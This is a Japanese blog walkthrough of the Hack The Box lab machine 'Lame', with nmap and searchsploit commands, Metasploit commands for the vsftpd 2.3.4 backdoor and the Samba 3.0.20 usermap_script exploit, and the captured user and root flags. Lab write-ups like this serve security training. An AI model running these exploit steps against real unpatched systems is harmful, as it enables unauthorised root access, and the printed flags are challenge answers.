セキュリティ技術メモブログ

日々の活動を記録する場所

【Hack The Box】Lame Walkthrough

はじめに

  • マシン名:Lame
  • OS:Linux
  • 目標:user.txtとroot.txtの中身の取得
  • ターゲットIPアドレス:10.10.10.3

ポートスキャン

ポートスキャンを実行。

# nmap -A 10.10.10.3

f:id:Paichan:20200412225541p:plain 21(ftp)、22(ssh)、139(netbios-ssn)、445(netbios-ssn)が開いている。

vsftpd 2.3.4の調査

21番ポートで検出したvsftpd 2.3.4のエクスプロイトコードを探してみる。

# searchsploit vsftpd 2.3.4

f:id:Paichan:20200412230854p:plain Metasploitにエクスプロイトコードがあるようだ。

# msfconsole
msf5 > search vsftpd 2.3.4
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 > set RHOSTS 10.10.10.3
msf5 > show options
msf5 > exploit

f:id:Paichan:20200412231240p:plain コードは実行できたが、セッションが確立できなかったので失敗。 別のポートを調査する。

Samba smbd 3.0.20の調査

445番ポートで検出したSamba smbd 3.0.20のエクスプロイトコードを探してみる

# searchsploit samba 3.0.20

f:id:Paichan:20200412232154p:plain これもMetasploitにエクスプロイトコードがあるようだ。

# msfconsole
msf5 > search samba 3.0.20
msf5 > use exploit/multi/samba/usermap_script 
msf5 > set RHOSTS 10.10.10.3
msf5 > set RPORT 445
msf5 > exploit

※payloadを指定しないとMetasploitが判断して勝手に設定してくれる。

エクスプロイトコード実行後、rootとして任意のコマンドが実行できるようになった。 後は以下の流れでuser.txtとroot.txtの中身が取得できた。

cd /home
ls
cd makis
ls
cat user.txt
cd /root
ls
cat root.txt

f:id:Paichan:20200412232943p:plain

user.txt:69454a937d94f5f0225ea00acd2e84c5
root.txt:92caac3be140ef409e45721348a4e9df